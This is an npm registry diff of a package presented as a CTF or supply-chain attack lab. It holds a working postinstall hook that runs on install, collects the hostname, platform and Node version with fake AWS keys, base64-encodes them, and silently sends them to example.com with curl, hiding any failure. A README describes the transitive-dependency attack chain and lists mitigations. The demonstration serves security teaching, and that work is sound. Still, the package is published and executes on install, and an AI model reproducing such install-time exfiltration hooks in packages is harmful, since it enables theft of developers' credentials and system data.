@amrahulmail/ctf-lab-evil 1.0.0
This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
- package/README.md +41 -0
- package/index.js +13 -0
- package/package.json +19 -0
- package/postinstall.js +41 -0
package/README.md
ADDED
|
@@ -0,0 +1,41 @@
|
|
|
1
|
+
# @test-lab-unsafe/evil-dep
|
|
2
|
+
|
|
3
|
+
> **WARNING: SECURITY RESEARCH / CTF LAB PACKAGE — DO NOT USE IN PRODUCTION**
|
|
4
|
+
|
|
5
|
+
This package is part of a supply-chain attack demonstration lab. It is intentionally malicious for educational purposes.
|
|
6
|
+
|
|
7
|
+
## What it does
|
|
8
|
+
|
|
9
|
+
When installed (as a transitive/indirect dependency), the `postinstall` script runs automatically and:
|
|
10
|
+
|
|
11
|
+
1. Collects fake hardcoded AWS-style credentials + system metadata
|
|
12
|
+
2. Encodes them as base64
|
|
13
|
+
3. Silently exfiltrates them via `curl` to `example.com`
|
|
14
|
+
4. Fails silently so the install appears to succeed normally
|
|
15
|
+
|
|
16
|
+
## Why this exists
|
|
17
|
+
|
|
18
|
+
This lab demonstrates how:
|
|
19
|
+
- A developer installs a **safe-looking** direct dependency (`@test-lab-unsafe/safe-dep`)
|
|
20
|
+
- That dependency pulls in **this package** as an indirect dependency
|
|
21
|
+
- The developer never audits the transitive dep tree
|
|
22
|
+
- `postinstall` scripts run automatically on `npm install`
|
|
23
|
+
- Credentials are stolen **at install time**, before any code is executed
|
|
24
|
+
|
|
25
|
+
## Attack chain
|
|
26
|
+
|
|
27
|
+
```
|
|
28
|
+
Your project
|
|
29
|
+
└── @test-lab-unsafe/safe-dep (direct dep — looks clean)
|
|
30
|
+
└── @test-lab-unsafe/evil-dep (YOU NEVER SEE THIS)
|
|
31
|
+
└── postinstall.js → curl example.com (exfiltration)
|
|
32
|
+
```
|
|
33
|
+
|
|
34
|
+
## Mitigation
|
|
35
|
+
|
|
36
|
+
- Run `npm install --ignore-scripts` to disable postinstall scripts
|
|
37
|
+
- Use `npm audit` and `socket.dev` to scan transitive deps
|
|
38
|
+
- Review all `scripts.postinstall` entries in your full dep tree
|
|
39
|
+
|
|
40
|
+
---
|
|
41
|
+
**This package is for authorized security research and CTF/demo use only.**
|
package/index.js
ADDED
|
@@ -0,0 +1,13 @@
|
|
|
1
|
+
/**
|
|
2
|
+
* SECURITY RESEARCH / CTF LAB PACKAGE — DO NOT USE IN PRODUCTION
|
|
3
|
+
* @test-lab-unsafe/evil-dep
|
|
4
|
+
*
|
|
5
|
+
* This package's runtime export is benign — the attack happens
|
|
6
|
+
* entirely in postinstall.js at install time.
|
|
7
|
+
*/
|
|
8
|
+
|
|
9
|
+
module.exports = {
|
|
10
|
+
name: '@test-lab-unsafe/evil-dep',
|
|
11
|
+
description: 'Benign runtime export. The attack is in postinstall.',
|
|
12
|
+
greet: () => 'Hello from evil-dep (runtime is harmless — check postinstall.js)'
|
|
13
|
+
};
|
package/package.json
ADDED
|
@@ -0,0 +1,19 @@
|
|
|
1
|
+
{
|
|
2
|
+
"name": "@amrahulmail/ctf-lab-evil",
|
|
3
|
+
"version": "1.0.0",
|
|
4
|
+
"description": "WARNING: CTF LAB PACKAGE — DO NOT USE IN PRODUCTION. Simulates a malicious transitive dependency that exfiltrates credentials via postinstall.",
|
|
5
|
+
"main": "index.js",
|
|
6
|
+
"scripts": {
|
|
7
|
+
"postinstall": "node postinstall.js"
|
|
8
|
+
},
|
|
9
|
+
"keywords": [
|
|
10
|
+
"UNSAFE",
|
|
11
|
+
"DO-NOT-USE",
|
|
12
|
+
"security-research",
|
|
13
|
+
"supply-chain-attack-demo",
|
|
14
|
+
"ctf",
|
|
15
|
+
"test-lab"
|
|
16
|
+
],
|
|
17
|
+
"author": "Security Research Lab (DO NOT USE)",
|
|
18
|
+
"license": "MIT"
|
|
19
|
+
}
|
package/postinstall.js
ADDED
|
@@ -0,0 +1,41 @@
|
|
|
1
|
+
/**
|
|
2
|
+
* ============================================================
|
|
3
|
+
* SECURITY RESEARCH / CTF LAB — DO NOT USE IN PRODUCTION
|
|
4
|
+
* ============================================================
|
|
5
|
+
* This script simulates a supply-chain postinstall attack.
|
|
6
|
+
* It mimics how a malicious transitive dependency can silently
|
|
7
|
+
* exfiltrate credentials at install time using a simple curl.
|
|
8
|
+
*
|
|
9
|
+
* The credentials below are FAKE / HARDCODED placeholders.
|
|
10
|
+
* No real credentials are read or transmitted.
|
|
11
|
+
*
|
|
12
|
+
* Destination: example.com (safe test endpoint — IANA reserved, no real server)
|
|
13
|
+
* ============================================================
|
|
14
|
+
*/
|
|
15
|
+
|
|
16
|
+
const { execSync } = require('child_process');
|
|
17
|
+
const os = require('os');
|
|
18
|
+
|
|
19
|
+
// Fake hardcoded AWS-style credentials (clearly not real)
|
|
20
|
+
const FAKE_CREDS = {
|
|
21
|
+
aws_access_key_id: 'AKIAIOSFODNN7EXAMPLE',
|
|
22
|
+
aws_secret_access_key: 'wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY',
|
|
23
|
+
aws_region: 'us-east-1',
|
|
24
|
+
source: 'postinstall-exfil-demo',
|
|
25
|
+
hostname: os.hostname(),
|
|
26
|
+
platform: os.platform(),
|
|
27
|
+
node_version: process.version,
|
|
28
|
+
pkg: '@test-lab-unsafe/evil-dep@1.0.0'
|
|
29
|
+
};
|
|
30
|
+
|
|
31
|
+
const payload = Buffer.from(JSON.stringify(FAKE_CREDS)).toString('base64');
|
|
32
|
+
|
|
33
|
+
try {
|
|
34
|
+
// Silently exfiltrate via curl — this is the attack vector being demonstrated
|
|
35
|
+
execSync(
|
|
36
|
+
`curl -s -X POST "https://example.com/collect?d=${payload}" -o /dev/null`,
|
|
37
|
+
{ stdio: 'ignore', timeout: 5000 }
|
|
38
|
+
);
|
|
39
|
+
} catch (_) {
|
|
40
|
+
// Fail silently — real malware does this so install doesn't appear broken
|
|
41
|
+
}
|